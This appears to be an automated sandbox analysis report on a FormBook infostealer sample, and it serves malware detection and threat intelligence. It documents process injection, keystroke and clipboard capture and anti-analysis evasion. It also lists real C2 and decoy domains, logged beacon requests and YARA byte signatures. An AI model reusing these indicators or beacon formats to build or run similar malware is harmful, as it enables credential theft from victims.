Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2022-571-GLS.exe

Overview

General Information

Sample Name:2022-571-GLS.exe
Analysis ID:755996
MD5:6cc14805bbf5e6bfb4daae5c8a61af7e
SHA1:34836f2aa6a4e97705352a50d2a7147c857fea94
SHA256:029d4fe47cb21a8f4e1dbe1863cf43cba6ac777e008b9675d381fda82986196b
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • 2022-571-GLS.exe (PID: 5464 cmdline: C:\Users\user\Desktop\2022-571-GLS.exe MD5: 6CC14805BBF5E6BFB4DAAE5C8A61AF7E)
    • jsqqecy.exe (PID: 1236 cmdline: "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up MD5: 07875284CE0A6276F406B25F9E429270)
      • jsqqecy.exe (PID: 1224 cmdline: "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up MD5: 07875284CE0A6276F406B25F9E429270)
        • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • netsh.exe (PID: 6140 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • cmd.exe (PID: 4136 cmdline: /c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cdlcapitolsolutions.com/b31b/"], "decoy": ["deltafxtrading.com", "alisonangl.com", "cdfqs.com", "easyentry.vip", "dentalinfodomain.com", "hiphoppianyc.com", "pools-62911.com", "supportteam26589.site", "delldaypa.one", "szanody.com", "diaper-basket.art", "ffscollab.com", "freediverconnect.com", "namesbrun.com", "theprimone.top", "lenzolab.com", "cikmas.com", "genyuei-no.space", "hellofstyle.com", "lamagall.com", "hallmarktb.com", "hifebou7.info", "sex5a.finance", "printrynner.com", "powerrestorationllc.com", "hirefiz.com", "uninvitedempire.com", "alpinemaintenance.online", "ppcadshub.com", "looking4.tours", "dirtyhandsmedia.com", "capishe.website", "cachorrospitbull.com", "mythic-authentication.online", "nordingcave.online", "gremep.online", "tryufabetcasino.com", "premiumciso.com", "powerful70s.com", "myminecraftrealm.com", "bssurgery.com", "steel-pcint.com", "iokailyjewelry.com", "barmanon5.pro", "kcrsw.com", "9393xx38.app", "kochen-mit-induktion.com", "indtradors.store", "giaxevn.info", "trungtambaohanhariston.com", "fulili.com", "crgabions.com", "matomekoubou.com", "duaidapduapjdp.site", "invissiblefriends.com", "cy3.space", "idqoft.com", "jamal53153.com", "lemagnetix.com", "anthroaction.com", "uspcff.top", "supplierdir.com", "counterpoint.online", "zarl.tech"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.jsqqecy.exe.1090000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.jsqqecy.exe.1090000.1.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        1.2.jsqqecy.exe.1090000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.jsqqecy.exe.1090000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.jsqqecy.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 19 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: 2022-571-GLS.exeReversingLabs: Detection: 30%
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.cdlcapitolsolutions.com/b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDiAvira URL Cloud: Label: malware
          Source: www.cdlcapitolsolutions.com/b31b/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeReversingLabs: Detection: 19%
          Machine Learning detection for sample
          Source: 2022-571-GLS.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeJoe Sandbox ML: detected
          Source: 1.2.jsqqecy.exe.1090000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.jsqqecy.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.jsqqecy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cdlcapitolsolutions.com/b31b/"], "decoy": ["deltafxtrading.com", "alisonangl.com", "cdfqs.com", "easyentry.vip", "dentalinfodomain.com", "hiphoppianyc.com", "pools-62911.com", "supportteam26589.site", "delldaypa.one", "szanody.com", "diaper-basket.art", "ffscollab.com", "freediverconnect.com", "namesbrun.com", "theprimone.top", "lenzolab.com", "cikmas.com", "genyuei-no.space", "hellofstyle.com", "lamagall.com", "hallmarktb.com", "hifebou7.info", "sex5a.finance", "printrynner.com", "powerrestorationllc.com", "hirefiz.com", "uninvitedempire.com", "alpinemaintenance.online", "ppcadshub.com", "looking4.tours", "dirtyhandsmedia.com", "capishe.website", "cachorrospitbull.com", "mythic-authentication.online", "nordingcave.online", "gremep.online", "tryufabetcasino.com", "premiumciso.com", "powerful70s.com", "myminecraftrealm.com", "bssurgery.com", "steel-pcint.com", "iokailyjewelry.com", "barmanon5.pro", "kcrsw.com", "9393xx38.app", "kochen-mit-induktion.com", "indtradors.store", "giaxevn.info", "trungtambaohanhariston.com", "fulili.com", "crgabions.com", "matomekoubou.com", "duaidapduapjdp.site", "invissiblefriends.com", "cy3.space", "idqoft.com", "jamal53153.com", "lemagnetix.com", "anthroaction.com", "uspcff.top", "supplierdir.com", "counterpoint.online", "zarl.tech"]}
          Source: 2022-571-GLS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: netsh.pdb source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD52F3 FindFirstFileExW,1_2_00BD52F3
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00BD53A7
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD52F3 FindFirstFileExW,2_2_00BD52F3
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 2_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00BD53A7
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 4x nop then pop esi2_2_0041732C
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 4x nop then pop edi2_2_0040E47D

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.easyentry.vip
          Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.221.114.43 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cdlcapitolsolutions.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.81.221 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.fulili.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.cdlcapitolsolutions.com/b31b/
          Source: Joe Sandbox ViewASN Name: sun-asnSC sun-asnSC
          Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi HTTP/1.1Host: www.cdlcapitolsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDi HTTP/1.1Host: www.easyentry.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDi HTTP/1.1Host: www.fulili.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.117.168.233 34.117.168.233
          Source: Joe Sandbox ViewIP Address: 34.117.168.233 34.117.168.233
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 29 Nov 2022 12:17:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 29 Nov 2022 12:17:56 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
          Source: 2022-571-GLS.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 2022-571-GLS.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000000.364781909.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.317290516.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.347986981.0000000008260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.cdlcapitolsolutions.com
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi HTTP/1.1Host: www.cdlcapitolsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDi HTTP/1.1Host: www.easyentry.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDi HTTP/1.1Host: www.fulili.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCAD00 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,1_2_00BCAD00
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BCB890 GetKeyboardState,1_2_00BCB890
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405125

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
